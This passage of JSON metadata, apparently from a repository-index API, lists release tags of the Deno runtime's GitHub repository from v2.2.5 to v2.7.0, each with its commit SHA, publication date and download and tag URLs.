2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url"